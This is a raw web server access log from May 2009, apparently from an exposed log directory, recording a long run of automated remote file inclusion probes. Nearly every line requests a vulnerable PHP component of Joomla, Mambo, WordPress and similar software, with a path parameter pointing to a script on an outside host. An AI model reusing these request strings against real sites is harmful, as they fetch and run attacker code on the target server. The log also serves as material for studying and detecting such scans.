112.175.141.41 - - [31/May/2009:05:06:17 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335
72.30.79.32 - - [31/May/2009:05:06:27 -0400] "GET /robots.txt HTTP/1.0" 404 291
72.30.79.32 - - [31/May/2009:05:06:27 -0400] "GET /log/hkmc.sdaglobal.org-error_log HTTP/1.0" 200 -
83.103.72.130 - - [31/May/2009:05:08:19 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 311
83.103.72.130 - - [31/May/2009:05:08:19 -0400] "GET /log/sdaglobal.org-access_log%20%20//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 338
83.103.72.130 - - [31/May/2009:05:08:20 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 307
124.217.216.86 - - [31/May/2009:05:10:00 -0400] "GET /log/sdaglobal.org-access_log.1/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt????? HTTP/1.1" 404 312
116.36.213.166 - - [31/May/2009:05:11:47 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
116.36.213.166 - - [31/May/2009:05:11:54 -0400] "GET /log/sdaglobal.org-access_log.1/?DOCUMENT_ROOT=http://stelsis.ru//templates/fxid.txt? HTTP/1.1" 404 312
116.36.213.166 - - [31/May/2009:05:11:56 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362
83.103.72.130 - - [31/May/2009:05:12:35 -0400] "GET /errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 291
83.103.72.130 - - [31/May/2009:05:12:35 -0400] "GET /log/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 295
83.103.72.130 - - [31/May/2009:05:12:36 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 324
83.103.72.130 - - [31/May/2009:05:13:13 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 324
216.221.10.116 - - [31/May/2009:05:15:39 -0400] "GET /log/sdaglobal.org-access_log.4///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 342
83.103.72.130 - - [31/May/2009:05:16:05 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 322
216.221.10.116 - - [31/May/2009:05:16:05 -0400] "GET /log/sdaglobal.org-error_log.1///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 341
83.103.72.130 - - [31/May/2009:05:16:09 -0400] "GET /log/sdaglobal.org-access_log.4/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 322
62.146.68.61 - - [31/May/2009:05:17:27 -0400] "GET //newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 306
62.146.68.61 - - [31/May/2009:05:17:27 -0400] "GET /log/sdaglobal.org-access_log.3//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 337
62.146.68.61 - - [31/May/2009:05:17:27 -0400] "GET /log//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 310
62.146.68.61 - - [31/May/2009:05:17:29 -0400] "GET //newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 306
62.146.68.61 - - [31/May/2009:05:17:29 -0400] "GET /log//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 310
62.146.68.61 - - [31/May/2009:05:17:29 -0400] "GET /log/sdaglobal.org-access_log.3//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 337
89.234.63.110 - - [31/May/2009:05:18:39 -0400] "GET /mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 293
89.234.63.110 - - [31/May/2009:05:18:39 -0400] "GET /log/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 297
89.234.63.110 - - [31/May/2009:05:18:39 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 326
89.234.63.110 - - [31/May/2009:05:18:40 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 326
89.234.63.110 - - [31/May/2009:05:18:40 -0400] "GET /mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 293
89.234.63.110 - - [31/May/2009:05:18:40 -0400] "GET /log/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 297
89.223.3.98 - - [31/May/2009:05:19:01 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 324
89.223.3.98 - - [31/May/2009:05:19:01 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 324
89.223.3.98 - - [31/May/2009:05:19:10 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 355
89.223.3.98 - - [31/May/2009:05:19:10 -0400] "GET /log/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 328
89.223.3.98 - - [31/May/2009:05:19:10 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 355
89.223.3.98 - - [31/May/2009:05:19:10 -0400] "GET /log/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 328
62.146.68.61 - - [31/May/2009:05:19:39 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 339
221.139.104.104 - - [31/May/2009:05:19:45 -0400] "GET /log/sdaglobal.org-access_log.1/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 312
62.146.68.61 - - [31/May/2009:05:19:45 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 339
89.234.63.110 - - [31/May/2009:05:20:55 -0400] "GET /log/sdaglobal.org-access_log.4/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 324
89.234.63.110 - - [31/May/2009:05:21:03 -0400] "GET /log/sdaglobal.org-access_log.4/mainbody.php?option=com_custompages&cpage=http://primkray.ru/clx/copyright? HTTP/1.1" 404 324
62.146.68.61 - - [31/May/2009:05:22:37 -0400] "GET /log/sdaglobal.org-error_log.4%20%20//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 338
62.146.68.61 - - [31/May/2009:05:22:51 -0400] "GET /log/sdaglobal.org-error_log.4%20%20//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 338
89.223.3.98 - - [31/May/2009:05:26:00 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 357
112.175.141.41 - - [31/May/2009:05:26:27 -0400] "GET /log/sdaglobal.org-access_log/config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 331
112.175.141.41 - - [31/May/2009:05:26:29 -0400] "GET /log/sdaglobal.org-error_log.1/config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 332
110.45.145.92 - - [31/May/2009:05:27:21 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 319
221.139.104.104 - - [31/May/2009:05:27:22 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 333
221.139.104.104 - - [31/May/2009:05:27:22 -0400] "GET /log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 337
221.139.104.104 - - [31/May/2009:05:27:22 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 366
112.175.141.41 - - [31/May/2009:05:27:35 -0400] "GET /log/sdaglobal.org-access_log.4/config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 333
221.139.104.104 - - [31/May/2009:05:27:53 -0400] "GET /log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 337
221.139.104.104 - - [31/May/2009:05:28:06 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 366
62.146.68.61 - - [31/May/2009:05:28:28 -0400] "GET /log/sdaglobal.org-error_log.4//newbb_plus/viewtopic.php?topic_id=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 336
89.223.3.98 - - [31/May/2009:05:30:01 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 357
203.194.204.129 - - [31/May/2009:05:32:50 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 343
203.194.204.129 - - [31/May/2009:05:32:50 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 347
203.194.204.129 - - [31/May/2009:05:32:50 -0400] "GET /log/sdaglobal.org-access_log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 374
203.194.204.129 - - [31/May/2009:05:33:04 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 343
203.194.204.129 - - [31/May/2009:05:33:04 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 347
203.194.204.129 - - [31/May/2009:05:33:04 -0400] "GET /log/sdaglobal.org-access_log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 372
203.194.204.129 - - [31/May/2009:05:33:14 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 343
203.194.204.129 - - [31/May/2009:05:33:14 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 347
203.194.204.129 - - [31/May/2009:05:33:14 -0400] "GET /log/sdaglobal.org-access_log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 372
110.45.145.92 - - [31/May/2009:05:34:45 -0400] "GET /log/sdaglobal.org-access_log.3//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 350
110.45.145.92 - - [31/May/2009:05:34:46 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 319
110.45.145.92 - - [31/May/2009:05:34:47 -0400] "GET /log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 323
89.223.3.98 - - [31/May/2009:05:36:21 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 357
89.223.3.98 - - [31/May/2009:05:37:16 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 357
122.122.35.33 - - [31/May/2009:05:41:04 -0400] "GET /images/gd.gif HTTP/1.1" 304 -
110.45.145.92 - - [31/May/2009:05:42:48 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mobtime.com/en/cpmHelp/id.txt?? HTTP/1.1" 404 350
221.139.104.104 - - [31/May/2009:05:42:56 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 366
221.139.104.104 - - [31/May/2009:05:46:16 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 366
124.217.216.86 - - [31/May/2009:05:47:14 -0400] "GET /log/sdaglobal.org-access_log.4/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/ccn.txt??? HTTP/1.1" 404 312
124.217.216.86 - - [31/May/2009:05:47:15 -0400] "GET /?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/ccn.txt??? HTTP/1.1" 200 9432
124.217.216.86 - - [31/May/2009:05:47:16 -0400] "GET /log/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/ccn.txt??? HTTP/1.1" 200 58283
89.223.3.98 - - [31/May/2009:05:49:20 -0400] "GET /log/sdaglobal.org-access_log.3/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 355
124.8.81.117 - - [31/May/2009:05:50:01 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
124.8.81.117 - - [31/May/2009:05:50:01 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
89.223.3.98 - - [31/May/2009:05:51:26 -0400] "GET /log/sdaglobal.org-access_log.3/components/com_simpleboard/image_upload.php?sbp=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 355
85.214.120.47 - - [31/May/2009:05:52:29 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 325
124.217.216.86 - - [31/May/2009:05:56:37 -0400] "GET /log/sdaglobal.org-error_log.1/?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/ccn.txt??? HTTP/1.1" 404 311
83.231.138.99 - - [31/May/2009:05:57:17 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[****************S_DIR]=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 325
72.232.198.162 - - [31/May/2009:05:58:15 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 380
72.232.198.162 - - [31/May/2009:05:58:15 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 380
72.232.198.162 - - [31/May/2009:05:58:15 -0400] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 349
72.232.198.162 - - [31/May/2009:05:58:15 -0400] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 349
72.232.198.162 - - [31/May/2009:05:58:15 -0400] "GET /log//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 353
72.232.198.162 - - [31/May/2009:05:58:15 -0400] "GET /log//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 353
124.217.216.86 - - [31/May/2009:05:58:25 -0400] "GET /?DOCUMENT_ROOT=http://largeface.com/gnuboard4/tail/ccn.txt??? HTTP/1.1" 200 9432
216.191.52.68 - - [31/May/2009:05:58:32 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 291
216.191.52.68 - - [31/May/2009:05:58:32 -0400] "GET /log/sdaglobal.org-access_log.1//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 322
216.191.52.68 - - [31/May/2009:05:58:32 -0400] "GET /log//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 295
74.208.111.178 - - [31/May/2009:05:58:41 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 291
74.208.111.178 - - [31/May/2009:05:58:41 -0400] "GET /log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 295
74.208.111.178 - - [31/May/2009:05:58:42 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320
74.208.111.178 - - [31/May/2009:05:58:43 -0400] "GET /log/sdaglobal.org-access_log.4//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
112.175.141.41 - - [31/May/2009:05:58:51 -0400] "GET /log/sdaglobal.org-access_log.1//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 322
112.175.141.41 - - [31/May/2009:05:58:51 -0400] "GET /log//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 295
112.175.141.41 - - [31/May/2009:05:58:52 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 291
222.122.72.93 - - [31/May/2009:05:59:28 -0400] "GET /log//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 295
222.122.72.93 - - [31/May/2009:05:59:29 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 291
222.122.72.93 - - [31/May/2009:05:59:29 -0400] "GET /log/sdaglobal.org-access_log.1//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 322
200.107.3.73 - - [31/May/2009:06:00:04 -0400] "GET /log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 336
200.107.3.73 - - [31/May/2009:06:00:04 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 363
200.107.3.73 - - [31/May/2009:06:00:04 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 332
218.146.255.11 - - [31/May/2009:06:00:05 -0400] "GET /log/sdaglobal.org-access_log.1//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 322
218.146.255.11 - - [31/May/2009:06:00:05 -0400] "GET /log//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 295
218.146.255.11 - - [31/May/2009:06:00:05 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 291
83.231.138.99 - - [31/May/2009:06:00:13 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_extcalendar/admin_events.php?CONFIG_EXT[****************S_DIR]=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 356
83.231.138.99 - - [31/May/2009:06:00:13 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[****************S_DIR]=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 325
83.231.138.99 - - [31/May/2009:06:00:13 -0400] "GET /log//components/com_extcalendar/admin_events.php?CONFIG_EXT[****************S_DIR]=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 329
72.232.198.162 - - [31/May/2009:06:00:14 -0400] "GET /log/sdaglobal.org-access_log.4//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 380
72.232.198.162 - - [31/May/2009:06:00:14 -0400] "GET /log/sdaglobal.org-access_log.4//administrator/components/com_joomla-visites/core/include/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 380
69.50.197.106 - - [31/May/2009:06:01:00 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 291
69.50.197.106 - - [31/May/2009:06:01:00 -0400] "GET /log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 295
69.50.197.106 - - [31/May/2009:06:01:00 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320
116.36.213.166 - - [31/May/2009:06:01:00 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 291
116.36.213.166 - - [31/May/2009:06:01:01 -0400] "GET /log//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 295
69.50.197.106 - - [31/May/2009:06:01:02 -0400] "GET /log/sdaglobal.org-access_log.4//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
116.36.213.166 - - [31/May/2009:06:01:02 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 291
116.36.213.166 - - [31/May/2009:06:01:02 -0400] "GET /log//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 295
116.36.213.166 - - [31/May/2009:06:01:03 -0400] "GET /log/sdaglobal.org-access_log.1//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 322
116.36.213.166 - - [31/May/2009:06:01:04 -0400] "GET /log/sdaglobal.org-access_log.1//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 322
69.50.197.106 - - [31/May/2009:06:01:09 -0400] "GET /log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 295
